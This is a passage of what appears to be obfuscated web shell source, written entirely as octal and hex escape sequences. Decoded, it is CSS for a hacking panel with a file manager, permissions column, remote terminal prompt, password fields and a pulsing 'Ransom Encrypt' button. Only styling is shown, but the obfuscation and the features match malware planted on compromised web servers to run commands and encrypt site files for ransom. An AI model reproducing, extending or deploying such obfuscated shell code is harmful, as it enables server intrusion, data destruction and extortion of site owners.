20\143\x6f\154\154\141\160\163\x65\x3b\40\155\x61\x72\147\151\156\x2d\x74\x6f\x70\x3a\40\x31\x72\x65\x6d\73\40\175\xa\x20\11\11\56\162\x65\163\165\x6c\x74\163\55\164\x61\142\x6c\x65\40\x74\x68\54\x20\x2e\x72\145\x73\165\154\x74\x73\x2d\164\x61\142\154\145\40\x74\144\x20\173\40\x70\141\144\144\151\156\x67\x3a\x20\61\x32\x70\170\x20\61\x35\x70\x78\73\40\164\x65\x78\164\x2d\x61\x6c\x69\147\156\72\x20\154\145\x66\x74\73\x20\142\157\x72\144\145\x72\x2d\x62\x6f\x74\164\x6f\155\x3a\40\61\x70\170\40\163\157\154\x69\144\40\x76\141\162\x28\x2d\55\x62\157\162\x64\145\x72\55\143\157\154\x6f\x72\51\73\x20\x77\150\151\x74\x65\55\x73\x70\x61\143\145\x3a\x20\156\157\167\162\141\x70\73\x20\175\xa\x20\x9\11\56\x72\145\x73\165\x6c\x74\163\x2d\x74\141\142\154\145\x20\164\x68\40\173\40\x62\x61\x63\x6b\147\162\x6f\165\156\x64\x3a\40\166\x61\x72\50\x2d\55\142\147\x2d\154\x69\x67\x68\164\51\x3b\40\x66\x6f\x6e\x74\55\x77\145\151\147\150\x74\72\x20\x35\x30\x30\73\40\175\12\40\11\x9\x2e\146\x69\x6c\145\x2d\155\x61\x6e\x61\x67\145\162\40\x74\162\x3a\150\157\166\x65\x72\x20\x7b\40\x62\141\x63\153\147\162\x6f\x75\x6e\x64\x3a\x20\166\x61\162\50\55\x2d\x62\x67\55\x6c\151\147\150\164\x29\x3b\x20\175\12\x20\11\11\x2e\x72\x65\163\165\154\164\x73\x2d\164\x61\x62\154\x65\x20\x74\x64\40\x7b\x20\x77\150\151\164\x65\55\163\x70\x61\143\x65\x3a\x20\x70\162\145\x2d\167\x72\x61\160\x3b\x20\167\157\x72\144\x2d\x62\x72\x65\141\x6b\72\40\x62\162\145\x61\x6b\x2d\x61\154\x6c\73\40\175\12\40\x9\x9\56\146\x69\x6c\x65\x2d\155\x61\x6e\141\147\145\162\40\x2e\x66\x6e\x61\x6d\x65\x20\173\40\143\x75\162\x73\x6f\x72\72\40\160\x6f\x69\x6e\164\145\162\73\x20\164\x72\141\156\163\x69\x74\x69\x6f\x6e\72\40\143\157\x6c\x6f\x72\40\60\56\62\163\x3b\40\175\12\40\11\x9\56\x66\x69\x6c\x65\55\155\141\x6e\x61\x67\145\x72\40\56\x66\x6e\x61\155\145\x3a\x68\157\166\x65\162\40\173\40\x66\x69\154\164\x65\x72\x3a\40\142\162\x69\147\x68\164\x6e\145\163\163\50\61\x2e\62\x29\x3b\x20\x7d\12\40\x9\x9\56\x66\151\154\x65\x2d\x6d\141\156\x61\147\145\162\40\x2e\141\x63\164\151\157\156\x73\x20\x61\x20\173\40\x63\165\x72\x73\157\162\72\40\x70\x6f\x69\156\x74\145\162\x3b\x20\155\141\162\147\151\x6e\x3a\x20\x30\40\x38\x70\x78\73\x20\146\157\156\x74\x2d\x73\151\x7a\x65\72\40\61\56\x31\162\145\x6d\73\x20\164\145\x78\x74\x2d\x64\145\x63\157\x72\x61\164\x69\x6f\x6e\x3a\40\156\157\x6e\x65\73\40\144\151\x73\160\154\141\x79\72\40\151\156\154\151\x6e\145\x2d\142\154\157\x63\153\73\x20\164\162\141\156\163\x69\164\151\157\x6e\x3a\40\x74\x72\x61\x6e\x73\x66\157\162\155\x20\60\x2e\62\163\x3b\40\175\12\40\x9\x9\x2e\x66\151\154\145\x2d\155\x61\156\x61\147\145\x72\x20\56\141\143\x74\x69\157\x6e\163\x20\x61\72\x68\157\166\145\162\x20\173\40\x74\162\141\x6e\x73\146\x6f\x72\155\x3a\x20\163\143\141\154\x65\50\61\56\62\x29\x3b\40\x7d\xa\x20\11\11\x2e\146\156\x61\155\x65\55\x64\x69\x72\55\x77\162\x69\164\141\142\154\145\40\x7b\40\x63\x6f\x6c\x6f\162\72\40\166\x61\x72\50\x2d\x2d\141\143\x63\x65\156\164\x2d\147\x72\x65\x65\156\51\x3b\x20\175\x20\x2e\x66\156\141\x6d\x65\55\144\151\162\x2d\165\156\x77\x72\x69\x74\x61\x62\x6c\145\x20\x7b\x20\143\x6f\x6c\157\162\72\40\x76\141\x72\x28\x2d\55\141\143\x63\145\156\x74\x2d\162\145\144\x29\x3b\40\175\x20\56\x66\x6e\x61\155\x65\55\x66\151\154\x65\x2d\167\162\x69\164\141\x62\154\x65\40\x7b\x20\143\x6f\x6c\157\x72\72\40\166\141\x72\x28\x2d\x2d\164\145\170\164\x2d\154\151\x67\150\x74\x29\73\x20\x7d\x20\x2e\146\x6e\x61\155\x65\55\x66\151\154\145\x2d\x75\x6e\167\x72\151\x74\141\142\x6c\x65\40\x7b\x20\x63\x6f\x6c\157\162\72\40\166\141\x72\50\55\55\164\145\170\x74\x2d\155\x65\144\x29\x3b\x20\x7d\xa\x20\x9\11\x2e\x66\151\154\145\x2d\155\x61\156\141\x67\145\x72\x20\x2e\160\145\162\x6d\163\x2d\x63\x6f\154\40\173\x20\146\157\156\x74\55\x66\141\x6d\x69\154\x79\72\x20\x6d\x6f\156\x6f\163\160\x61\143\145\x3b\40\x63\x6f\154\x6f\162\72\x20\166\141\162\x28\x2d\55\x74\145\170\x74\55\x6d\x65\144\51\x3b\x20\175\12\x20\x9\x9\56\x74\145\x72\155\151\x6e\141\x6c\40\173\x20\x62\x61\x63\153\x67\x72\x6f\165\x6e\144\72\40\x23\x30\x64\x31\61\x31\x37\73\x20\x70\x61\x64\144\151\x6e\x67\x3a\x20\61\x72\x65\x6d\73\40\146\x6c\145\170\x3a\40\x31\x3b\40\157\166\145\x72\x66\154\157\x77\55\171\x3a\40\x61\165\164\157\x3b\x20\167\150\151\x74\145\55\x73\160\x61\143\x65\72\40\x70\x72\x65\55\x77\162\x61\160\73\40\167\x6f\x72\144\55\167\162\x61\x70\72\40\142\162\145\x61\153\55\167\x6f\162\144\73\40\x6c\151\x6e\x65\x2d\x68\145\x69\x67\150\164\x3a\40\x31\x2e\66\x3b\x20\x7d\xa\40\x9\11\43\x74\x65\x72\x6d\55\x6f\165\x74\160\x75\x74\40\173\x20\x63\157\x6c\x6f\x72\72\x20\166\141\x72\x28\x2d\x2d\x74\x65\170\164\55\x6c\x69\x67\150\164\51\73\40\175\xa\x20\11\11\x2e\164\145\162\x6d\55\x70\162\157\x6d\160\x74\40\173\40\144\151\x73\160\154\x61\171\x3a\40\146\x6c\145\170\73\40\x61\154\x69\147\x6e\x2d\x69\x74\x65\x6d\x73\x3a\40\x63\145\156\164\x65\x72\73\40\175\xa\40\11\x9\43\x74\145\x72\x6d\x2d\x75\163\145\162\x2d\150\x6f\163\164\40\x7b\40\143\x6f\x6c\x6f\162\x3a\40\x76\x61\x72\50\x2d\x2d\x61\143\143\x65\x6e\x74\55\147\162\x65\145\156\x29\x3b\x20\x7d\12\x20\11\x9\43\164\145\162\x6d\x2d\143\167\x64\x20\173\40\x63\x6f\154\x6f\162\72\40\166\x61\x72\x28\55\x2d\141\x63\x63\x65\156\164\x2d\142\154\165\x65\x29\x3b\40\155\x61\x72\147\151\x6e\x2d\x6c\x65\x66\164\x3a\40\65\160\x78\73\175\12\40\11\x9\56\x74\145\162\155\x2d\x70\x72\x6f\155\160\164\x20\x2e\160\162\157\155\x70\x74\x2d\x73\x79\x6d\142\x6f\x6c\40\173\x20\143\x6f\154\157\162\72\40\166\141\162\50\x2d\55\141\x63\x63\x65\x6e\x74\x2d\x67\157\x6c\144\x29\x3b\40\155\x61\x72\x67\151\156\72\40\60\40\70\x70\x78\x3b\40\x7d\12\x20\11\11\43\164\x65\x72\x6d\55\x69\x6e\x70\165\x74\40\x7b\x20\167\x69\x64\164\150\x3a\x20\x31\60\60\x25\x3b\40\x62\141\x63\153\x67\x72\157\x75\x6e\x64\x3a\40\x74\x72\141\x6e\x73\160\x61\x72\145\x6e\164\73\40\142\157\x72\x64\x65\162\72\40\156\157\x6e\x65\73\x20\x63\157\x6c\157\x72\72\40\x76\x61\x72\50\55\55\164\145\170\x74\55\x6c\151\147\x68\x74\51\73\x20\x66\157\x6e\164\55\146\x61\155\x69\154\x79\x3a\40\x76\141\x72\x28\55\x2d\146\157\156\x74\x2d\x66\141\x6d\151\x6c\171\x29\73\40\x66\x6f\156\x74\x2d\163\x69\172\145\72\x20\61\x34\160\x78\73\x20\x6f\x75\x74\x6c\x69\156\145\72\40\156\157\156\x65\73\x20\x7d\xa\40\x9\11\x69\156\160\x75\164\x5b\164\x79\x70\x65\x3d\42\164\145\170\164\42\x5d\x2c\40\x69\x6e\x70\165\164\133\164\x79\x70\x65\75\42\160\x61\163\x73\167\x6f\x72\x64\42\x5d\x2c\x20\x69\156\160\165\164\133\164\x79\x70\x65\x3d\x22\156\x75\155\x62\145\162\x22\135\x2c\x20\x74\145\170\x74\141\x72\x65\141\x2c\x20\163\x65\x6c\145\143\x74\40\x7b\40\142\141\x63\x6b\147\x72\x6f\x75\x6e\144\72\40\x76\x61\x72\50\x2d\x2d\142\147\55\144\x61\162\x6b\51\73\x20\x63\x6f\154\x6f\x72\x3a\40\x76\x61\x72\50\55\55\164\x65\x78\x74\x2d\x6c\151\147\x68\x74\x29\x3b\40\x62\157\x72\144\145\x72\x3a\40\61\160\x78\40\x73\x6f\154\x69\144\x20\166\x61\162\50\55\x2d\142\157\x72\144\x65\162\55\143\x6f\154\x6f\162\x29\73\x20\x70\x61\144\144\x69\x6e\147\72\x20\61\x30\x70\170\40\x31\x32\x70\170\x3b\40\142\x6f\162\x64\x65\x72\55\162\x61\x64\x69\x75\163\x3a\x20\x36\160\170\x3b\x20\x66\157\x6e\164\55\146\141\x6d\151\154\171\x3a\40\166\141\162\50\x2d\x2d\x66\x6f\x6e\x74\55\x66\141\x6d\x69\x6c\171\51\73\x20\x66\x6f\x6e\x74\x2d\163\151\172\x65\72\x20\x31\x34\x70\x78\x3b\40\x74\162\x61\156\163\x69\164\151\157\x6e\72\40\142\157\162\x64\145\x72\x2d\143\x6f\x6c\x6f\x72\x20\x30\x2e\x32\x73\x2c\x20\142\157\x78\55\x73\150\x61\x64\x6f\167\x20\60\x2e\62\x73\x3b\x20\x7d\xa\x20\x9\11\151\156\160\x75\x74\133\x74\x79\x70\x65\75\x22\x74\x65\170\164\x22\135\72\x66\157\x63\165\x73\54\x20\x69\x6e\160\165\x74\x5b\x74\x79\x70\145\x3d\x22\160\x61\163\163\167\x6f\162\144\42\x5d\x3a\x66\157\143\x75\163\54\x20\151\x6e\160\165\x74\x5b\x74\171\x70\145\75\x22\x6e\x75\155\x62\145\162\42\135\x3a\146\157\x63\x75\x73\x2c\x20\164\145\x78\x74\141\162\x65\x61\72\146\157\x63\x75\x73\x20\173\x20\157\165\164\154\x69\x6e\145\x3a\x20\x6e\157\x6e\145\x3b\x20\142\x6f\x72\144\145\x72\55\x63\157\154\x6f\x72\72\x20\x76\141\x72\50\55\x2d\x61\x63\143\145\x6e\164\55\x62\154\x75\145\x29\x3b\40\x62\157\x78\x2d\x73\150\141\x64\157\x77\72\x20\x30\40\x30\40\x30\x20\62\x70\170\40\162\147\142\x61\50\61\x33\60\x2c\x20\x31\67\60\54\40\62\65\x35\54\x20\60\56\63\x29\73\x20\175\12\40\x9\x9\x62\x75\x74\x74\x6f\x6e\x20\173\x20\143\165\162\x73\x6f\x72\x3a\x20\160\x6f\x69\x6e\164\x65\x72\x3b\x20\x62\141\143\153\x67\162\x6f\x75\156\x64\72\40\x76\x61\162\50\55\x2d\141\x63\x63\145\x6e\164\55\x62\154\165\x65\51\73\x20\143\157\154\157\162\x3a\x20\166\x61\162\x28\55\55\142\x67\x2d\144\x61\162\x6b\x29\x3b\x20\x62\157\162\144\145\162\x3a\x20\x6e\157\156\x65\73\40\x70\x61\144\144\x69\x6e\x67\72\40\x31\x30\160\x78\40\x31\70\160\x78\x3b\x20\142\157\x72\x64\145\162\x2d\162\x61\144\x69\165\x73\x3a\40\66\160\x78\x3b\x20\146\x6f\x6e\x74\x2d\x66\x61\x6d\x69\x6c\x79\x3a\x20\x76\141\x72\x28\55\x2d\x66\x6f\156\x74\x2d\x66\x61\155\151\x6c\x79\x29\73\40\x66\x6f\x6e\164\x2d\x77\x65\151\147\150\164\72\40\65\60\60\73\x20\146\x6f\x6e\164\55\163\151\x7a\x65\x3a\x20\61\x34\160\170\73\x20\x74\162\141\x6e\163\151\164\x69\x6f\x6e\x3a\40\x62\x61\143\x6b\x67\x72\x6f\165\156\x64\40\x30\56\62\163\x2c\40\164\x72\141\x6e\163\x66\157\x72\155\40\60\56\x31\x73\x3b\40\x7d\xa\40\x9\11\142\x75\164\164\157\x6e\x3a\x68\157\166\145\162\40\173\40\142\141\x63\153\x67\162\157\165\x6e\x64\x3a\40\x23\x39\144\143\61\146\146\73\x20\x7d\12\40\x9\x9\142\165\x74\x74\x6f\x6e\x3a\x61\x63\x74\151\166\145\x20\x7b\40\164\x72\141\x6e\x73\146\x6f\162\x6d\72\x20\x73\143\x61\154\x65\x28\60\x2e\x39\x38\x29\x3b\40\x7d\12\11\x9\x62\x75\164\x74\157\x6e\x2e\x64\x61\x6e\147\x65\x72\55\142\164\x6e\40\x7b\x20\x62\x61\x63\153\147\x72\157\x75\156\x64\x3a\x20\166\x61\162\x28\55\55\141\143\143\x65\156\x74\55\x72\x65\x64\x29\73\x20\143\x6f\154\x6f\162\72\x20\x76\141\162\x28\55\x2d\x74\145\x78\164\x2d\x6c\x69\147\150\164\51\73\x20\175\xa\x9\x9\142\165\x74\x74\157\x6e\x2e\144\141\156\147\145\162\x2d\x62\164\x6e\x3a\x68\x6f\x76\x65\x72\40\173\40\142\x61\x63\x6b\147\162\157\165\x6e\144\72\40\x23\146\146\x37\71\71\61\73\x20\x7d\12\11\x9\xa\11\x9\57\52\x20\x53\x70\x65\143\x69\141\x6c\x20\163\164\x79\154\151\156\147\x20\x66\157\x72\x20\x52\141\156\x73\157\155\40\x45\156\x63\x72\171\160\164\40\x42\x75\164\164\x6f\x6e\40\52\x2f\xa\11\11\x23\162\x61\156\163\157\x6d\x2d\x65\156\x63\162\171\x70\x74\x2d\142\x74\x6e\40\x7b\xa\x9\11\x9\160\x6f\163\x69\164\151\157\156\x3a\x20\162\x65\x6c\141\164\x69\x76\x65\73\xa\11\x9\11\x62\x61\143\x6b\x67\162\x6f\x75\x6e\144\x3a\40\x6c\x69\x6e\x65\141\162\x2d\147\x72\141\144\x69\x65\156\x74\50\61\x33\65\x64\x65\147\54\40\x23\x64\143\63\x35\64\65\40\60\45\54\40\x23\x63\70\x32\x33\63\63\x20\65\60\x25\54\40\43\x62\x64\x32\x31\63\x30\40\x31\x30\60\x25\x29\73\xa\x9\11\x9\x63\x6f\154\157\x72\72\40\x23\146\x66\x66\146\146\x66\x3b\12\x9\11\x9\146\x6f\x6e\164\55\x77\x65\151\147\150\164\x3a\40\x36\60\x30\x3b\xa\x9\x9\x9\146\157\156\164\x2d\x73\x69\x7a\145\x3a\40\61\65\x70\x78\73\12\x9\x9\11\154\x65\164\164\x65\162\55\x73\160\x61\x63\151\x6e\x67\x3a\40\x30\x2e\65\160\170\73\12\x9\11\11\160\x61\x64\144\151\x6e\147\x3a\40\61\64\160\170\40\x32\x34\160\x78\73\12\x9\11\11\142\157\162\x64\145\x72\72\x20\x32\x70\x78\x20\x73\x6f\154\151\x64\x20\x72\147\x62\141\x28\x32\x35\x35\54\x20\62\65\65\54\40\x32\65\x35\x2c\x20\x30\56\62\51\73\12\11\11\11\x62\x6f\x78\55\163\x68\x61\x64\157\167\x3a\40\x30\40\x34\160\170\40\x31\65\x70\170\40\162\x67\x62\x61\50\x32\62\60\x2c\x20\x35\x33\x2c\40\x36\71\x2c\x20\60\56\64\x29\x2c\12\x9\x9\x9\11\11\x9\60\x20\x30\40\x32\60\160\170\x20\x72\x67\x62\x61\50\62\x32\60\x2c\x20\x35\x33\54\40\66\x39\54\x20\60\x2e\62\x29\54\xa\11\x9\x9\x9\x9\11\151\x6e\x73\x65\164\40\60\x20\61\160\170\x20\x30\x20\162\x67\x62\141\x28\x32\x35\x35\54\x20\62\65\x35\x2c\x20\62\65\65\54\40\60\56\61\51\x3b\12\11\x9\x9\x74\145\170\164\x2d\164\x72\141\156\163\x66\157\162\155\72\40\x75\160\x70\145\x72\x63\x61\x73\145\x3b\xa\x9\x9\11\157\x76\145\x72\146\154\157\x77\72\40\x68\x69\x64\x64\x65\x6e\73\12\11\11\11\164\162\x61\156\x73\x69\x74\x69\157\x6e\72\x20\x61\x6c\154\40\x30\56\63\x73\40\x63\x75\x62\151\143\55\x62\145\x7a\151\x65\162\50\x30\x2e\x34\54\40\x30\x2c\40\x30\x2e\62\54\40\x31\51\73\12\x9\x9\x7d\12\x9\11\12\11\11\43\x72\x61\156\163\x6f\x6d\x2d\145\x6e\x63\162\171\x70\x74\x2d\x62\x74\156\72\x3a\142\145\x66\157\x72\x65\x20\173\xa\11\11\x9\143\157\x6e\164\145\x6e\164\x3a\x20\47\x27\x3b\xa\x9\11\x9\x70\x6f\x73\x69\164\151\x6f\x6e\x3a\40\x61\142\x73\x6f\x6c\x75\x74\x65\73\12\x9\11\11\x74\x6f\160\72\40\60\x3b\xa\x9\11\x9\x6c\x65\x66\164\x3a\x20\55\x31\x30\60\45\x3b\12\11\x9\11\x77\151\x64\164\150\x3a\x20\x31\60\x30\45\x3b\xa\11\x9\x9\x68\145\151\147\150\164\72\x20\x31\x30\x30\x25\73\xa\11\x9\x9\x62\141\x63\153\x67\162\157\165\x6e\144\x3a\40\x6c\x69\x6e\x65\141\162\x2d\x67\162\141\144\151\x65\156\x74\x28\x39\60\144\x65\147\54\40\164\162\141\x6e\x73\x70\141\162\145\x6e\164\x2c\x20\162\147\x62\141\x28\62\x35\65\54\x20\62\65\x35\54\40\62\x35\x35\54\x20\x30\x2e\x32\51\x2c\x20\164\162\141\156\x73\x70\141\x72\x65\x6e\x74\51\x3b\12\x9\11\x9\x74\x72\x61\156\x73\151\164\x69\x6f\x6e\72\40\x6c\145\146\x74\x20\x30\x2e\x35\163\73\xa\x9\x9\175\12\11\x9\12\x9\x9\x23\x72\x61\156\x73\x6f\x6d\x2d\145\x6e\143\162\171\x70\164\x2d\x62\164\x6e\x3a\x68\157\166\145\x72\x3a\x3a\142\145\146\157\162\x65\x20\173\xa\x9\11\11\154\x65\146\164\72\x20\61\60\60\45\x3b\xa\x9\x9\x7d\xa\11\11\xa\x9\x9\43\x72\x61\156\x73\x6f\x6d\x2d\x65\156\x63\162\171\160\164\x2d\142\x74\156\x3a\150\157\x76\145\x72\40\173\xa\x9\x9\11\x62\x61\143\x6b\x67\x72\157\165\x6e\144\x3a\40\x6c\151\x6e\145\141\x72\55\x67\162\141\x64\151\145\156\x74\50\x31\63\65\x64\x65\x67\x2c\x20\x23\145\x36\63\71\x34\66\40\60\45\54\40\43\x64\66\x32\x38\x33\x39\x20\65\60\45\x2c\40\43\143\x38\x32\63\63\63\40\x31\60\60\45\51\x3b\12\11\x9\x9\164\162\141\x6e\x73\x66\x6f\x72\155\x3a\40\164\162\x61\156\163\x6c\x61\164\x65\x59\x28\55\x32\x70\170\51\73\xa\11\x9\11\142\x6f\x78\55\163\x68\x61\x64\157\167\x3a\40\60\40\x36\160\170\x20\x32\65\x70\170\x20\x72\x67\142\141\x28\x32\x32\60\54\40\x35\x33\x2c\x20\x36\x39\x2c\40\60\x2e\66\51\x2c\xa\11\11\x9\x9\x9\x9\x30\x20\x30\40\63\x30\160\170\40\162\147\x62\141\50\x32\62\60\54\40\x35\x33\x2c\x20\66\x39\54\x20\x30\x2e\x33\51\54\12\11\11\x9\x9\x9\x9\151\156\x73\x65\164\40\x30\40\x31\x70\x78\x20\60\40\x72\147\x62\141\50\62\x35\x35\54\x20\62\65\x35\54\40\x32\x35\65\54\x20\60\x2e\62\51\73\12\11\x9\x9\142\x6f\x72\x64\145\x72\55\143\x6f\154\157\x72\x3a\40\x72\147\142\141\x28\x32\x35\65\54\x20\x32\x35\65\54\x20\62\65\65\54\40\x30\x2e\x33\x29\73\xa\11\11\x7d\12\x9\x9\12\x9\11\x23\162\x61\x6e\163\x6f\x6d\x2d\x65\156\x63\162\171\160\x74\55\x62\164\156\x3a\141\x63\164\151\x76\x65\40\173\12\11\x9\x9\164\x72\x61\156\163\146\x6f\162\x6d\72\x20\164\x72\x61\x6e\163\x6c\141\x74\x65\x59\50\60\x70\x78\x29\x3b\xa\x9\11\11\x62\x6f\x78\x2d\163\150\141\144\x6f\x77\x3a\x20\60\40\62\x70\x78\x20\x31\x30\160\170\40\x72\147\142\141\50\62\x32\60\54\x20\x35\63\54\x20\x36\x39\54\x20\60\x2e\x34\x29\54\xa\11\11\x9\11\x9\11\151\x6e\163\145\x74\40\60\40\62\160\170\x20\x34\x70\170\40\x72\147\142\x61\x28\x30\x2c\x20\x30\x2c\40\60\54\x20\x30\56\x32\x29\x3b\xa\x9\11\x7d\12\x9\11\xa\x9\x9\43\162\141\156\x73\x6f\x6d\x2d\x65\156\143\x72\171\160\x74\x2d\142\164\x6e\72\146\157\x63\x75\163\x20\173\xa\x9\x9\11\x6f\165\x74\x6c\151\x6e\x65\72\x20\x6e\157\x6e\x65\73\xa\x9\11\x9\142\157\x78\x2d\x73\x68\141\144\157\167\x3a\x20\x30\40\x34\160\170\x20\x31\x35\160\x78\40\x72\x67\142\x61\x28\x32\62\60\x2c\40\65\63\x2c\x20\66\71\x2c\40\x30\x2e\x34\51\54\xa\11\x9\x9\x9\x9\11\60\40\60\40\62\x30\160\x78\40\x72\x67\x62\141\50\62\x32\x30\x2c\40\x35\63\54\40\66\71\x2c\40\x30\x2e\62\x29\54\xa\11\x9\11\11\11\x9\x30\x20\60\x20\x30\x20\x33\160\170\x20\162\147\142\141\x28\x32\x32\x30\x2c\40\x35\63\x2c\x20\x36\x39\x2c\x20\x30\56\x33\51\x3b\xa\x9\11\175\xa\11\11\xa\11\11\57\52\x20\120\x75\x6c\x73\145\x20\141\156\x69\x6d\x61\164\151\x6f\x6e\x20\x66\x6f\x72\x20\x61\164\x74\x65\x6e\164\151\x6f\x6e\40\x2a\57\xa\11\x9\100\x6b\x65\171\146\162\141\x6d\145\x73\x20\162\141\x6e\x73\157\155\120\x75\154\163\x65\x20\173\xa\11\x9\11\x30\45\54\40\61\60\x30\45\x20\x7b\xa\11\11\x9\11\142\x6f\x78\x2d\163\x68\x61\x64\x6f\167\x3a\x20\x30\x20\64\160\x78\x20\61\65\x70\x78\x20\162\147\142\x61\50\62\x32\60\54\40\x35\63\54\40\66\71\54\40\x30\x2e\x34\51\x2c\xa\x9\x9\11\x9\x9\x9\11\60\40\60\x20\x32\x30\x70\170\x20\x72\147\x62\141\x28\x32\x32\60\x2c\40\65\x33\x2c\x20\66\71\54\40\x30\x2e\x32\51\x3b\xa\11\x9\11\x7d\12\11\x9\11\65\x30\x25\40\173\xa\x9\x9\11\11\x62\x6f\x78\x2d\x73\x68\141\x64\x6f\x77\72\x20\x30\x20\x34\x70\x78\40\x32\60\160\x78\x20\162\147\142\141\x28\62\x32\60\54\40\x35\x33\54\40\66\71\x2c\x20\60\x2e\66\x29\54\xa\11\x9\11\x9\x9\x9\11\60\x20\60\40\63\60\160\x78\x20\x72\147\x62\x61\50\x32\x32\x30\54\40\65\63\54\x20\66\71\54\x20\x30\x2e\x34\x29\x3b\12\11\11\11\175\12\11\11\175\xa\x9\x9\xa\x9\x9\x23\162\x61\x6e\163\157\155\55\145\156\143\162\171\160\164\55\142\x74\156\x3a\x6e\157\164\50\72\144\151\163\x61\x62\x6c\145\x64\x29\40\173\xa\x9\x9\x9\x61\156\151\x6d\141\x74\x69\157\x6e\72\x20\x72\x61\x6e\163\157\155\x50\x75\x6c\x73\x65\40\62\163\x20\x65\141\163\x65\55\x69\x6e\55\x6f\x75\x74\x20\151\156\146\x69\156\151\x74\x65\x3b\xa\11\x9\x7d\xa\x9\11\xa\11\11\57\52\x20\x44\151\x73\x61\142\154\x65\x64\40\x73\x74\141\164\145\40\x2a\x2f\xa\x9\11\x23\162\141\156\x73\x6f\155\55\x65\156\x63\x72\x79\x70\x74\55\142\164\156\72\144\151\163\x61\x62\x6c\145\144\x20\x7b\12\x9\x9\x9\x6f\x70\x61\x63\x69\164\x79\x3a\x20\x30\56\x36\73\xa\11\x9\x9\x63\x75\x72\163\157\x72\x3a\x20\x6e\157\164\x2d\x61\154\154\x6f\x77\145\144\73\12\x9\x9\11\x61\156\151\x6d\141\164\x69\157\156\x3a\x20\156\157\156\x65\x3b\xa\x9\11\x7d\12\x20\x9\x9\56\157\165\164\160\x75\164\x2d\142\157\170\x20\x7b\40\142\141\x63\x6b\x67\162\157\x75\x6e\x64\x3a\40\x76\x61\x72\50\55\55\142\147\55\x64\x61\x72\x6b\51\73\40\x70\x61\144\x64\x69\x6e\x67\x3a\40\x31\162\145\x6d\x3b\40\x62\x6f\x72\x64\x65\x72\72\40\x31\160\170\40\x73\157\x6c\151\144\40\x76\x61\162\x28\x2d\55\x62\x6f\x72\x64\x65\x72\55\x63\x6f\154\x6f\162\x29\x3b\40\x62\157\x72\144\x65\162\x2d\x72\141\144\x69\165\x73\72\x20\x36\160\170\x3b\x20\x6d\x69\156\x2d\x68\145\151\147\150\164\x3a\x20\61\x35\x30\160\x78\73\x20\167\x68\x69\164\145\55\x73\160\141\x63\145\72\x20\160\162\x65\73\40\157\166\145\162\x66\x6c\157\x77\x2d\x78\72\40\x61\165\x74\157\x3b\40\155\x61\x72\x67\x69\x6e\55\164\157\x70\72\x20\61\x72\145\x6d\73\x20\146\157\156\164\55\x73\x69\x7a\x65\72\x20\61\x33\x70\x78\x3b\175\12\40\11\11\x2e\103\157\x64\145\x4d\151\162\x72\157\162\x20\x7b\40\x68\x65\151\x67\150\x74\x3a\40\x31\x30\x30\45\x3b\40\x62\157\x72\144\145\x72\x3a\40\61\160\170\x20\163\x6f\154\151\144\x20\x76\141\x72\x28\x2d\x2d\142\157\162\144\145\x72\55\x63\157\154\x6f\x72\x29\73\x20\x62\157\x72\144\x65\x72\55\x72\x61\144\151\165\163\x3a\x20\x36\160\x78\73\x20\x7d\12\x20\11\x9\x2e\x74\157\141\163\x74\40\x7b\40\160\x6f\x73\151\164\x69\157\156\72\40\146\x69\x78\145\x64\73\x20\x62\157\164\164\x6f\x6d\72\40\55\x31\x30\x30\x70\x78\x3b\40\x6c\145\x66\x74\x3a\40\65\60\x25\x3b\40\x74\162\141\x6e\x73\146\x6f\x72\x6d\x3a\x20\x74\x72\x61\x6e\x73\x6c\x61\x74\145\x58\50\x2d\65\x30\x25\51\73\x20\142\x61\x63\153\147\x72\x6f\165\156\144\x3a\x20\166\141\x72\x28\x2d\x2d\141\x63\143\x65\156\x74\55\x67\x72\x65\x65\x6e\51\73\40\143\157\154\x6f\x72\x3a\40\x76\141\x72\50\x2d\55\x62\147\x2d\144\141\x72\x6b\x29\73\x20\x70\x61\x64\x64\x69\x6e\147\72\x20\61\62\160\170\x20\62\x35\160\x78\x3b\40\x62\x6f\x72\x64\x65\x72\x2d\x72\x61\x64\x69\x75\x73\x3a\x20\66\160\170\73\40\172\x2d\x69\x6e\144\x65\x78\x3a\x20\62\60\x30\x30\73\x20\x62\x6f\170\x2d\163\150\141\x64\157\167\x3a\x20\60\40\x35\x70\x78\x20\x31\65\160\x78\40\162\x67\142\141\50\x30\x2c\x30\54\60\x2c\60\56\x32\x29\x3b\x20\146\x6f\x6e\x74\x2d\x77\x65\151\147\150\x74\72\40\x35\60\60\x3b\x20\x74\x72\141\156\163\x69\x74\x69\157\156\x3a\40\142\157\x74\164\x6f\x6d\40\60\x2e\x35\163\x20\145\x61\x73\145\x2d\151\156\x2d\x6f\165\164\73\40\x7d\12\x20\11\11\x2e\164\x6f\x61\163\164\56\x65\x72\x72\157\x72\x20\173\x20\142\141\143\x6b\x67\162\x6f\165\156\x64\x2d\x63\157\x6c\x6f\162\72\x20\166\x61\x72\x28\55\x2d\141\143\x63\145\x6e\164\x2d\x72\x65\144\x29\x3b\40\143\157\154\x6f\162\x3a\40\166\141\x72\x28\55\55\164\145\x78\164\55\x6c\x69\x67\150\164\51\73\x20\175\xa\x20\x9\11\56\164\157\141\x73\164\x2e\x73\x68\x6f\x77\x20\173\40\x62\157\164\164\157\x6d\x3a\x20\62\60\160\170\x3b\40\175\12\11\x9\56\x6e\157\164\x69\x66\151\x63\x61\x74\151\157\x6e\x2d\151\x74\x65\x6d\x20\x7b\40\142\x61\143\153\147\162\157\x75\x6e\x64\72\x20\166\x61\162\x28\55\55\142\x67\x2d\x6d\x65\144\x29\73\x20\x62\x6f\162\144\145\x72\x3a\40\x31\x70\170\x20\x73\x6f\x6c\x69\144\x20\x76\x61\x72\50\x2d\x2d\x62\x6f\x72\x64\x65\x72\55\143\157\x6c\x6f\x72\x29\x3b\40\x62\x6f\162\x64\145\162\x2d\x72\x61\x64\x69\x75\x73\72\x20\x36\160\170\73\x20\x70\x61\x64\x64\151\156\147\72\x20\61\62\160\170\73\x20\x64\x69\x73\160\154\141\171\x3a\40\x66\x6c\x65\x78\x3b\x20\x6a\165\x73\164\151\x66\171\x2d\x63\157\156\x74\145\156\x74\72\x20\163\160\141\143\x65\x2d\142\x65\x74\167\145\145\156\73\x20\141\154\151\147\156\55\x69\x74\x65\155\163\72\x20\163\164\141\162\x74\x3b\x20\x67\141\x70\72\40\x31\162\x65\x6d\73\x20\175\xa\x9\x9\x2e\156\x6f\x74\x69\x66\151\x63\141\164\151\157\x6e\x2d\x69\164\x65\155\x2e\151\156\x66\157\x20\x7b\x20\142\157\162\x64\x65\162\55\x6c\145\146\164\72\x20\x33\160\x78\x20\x73\157\154\x69\x64\40\x76\x6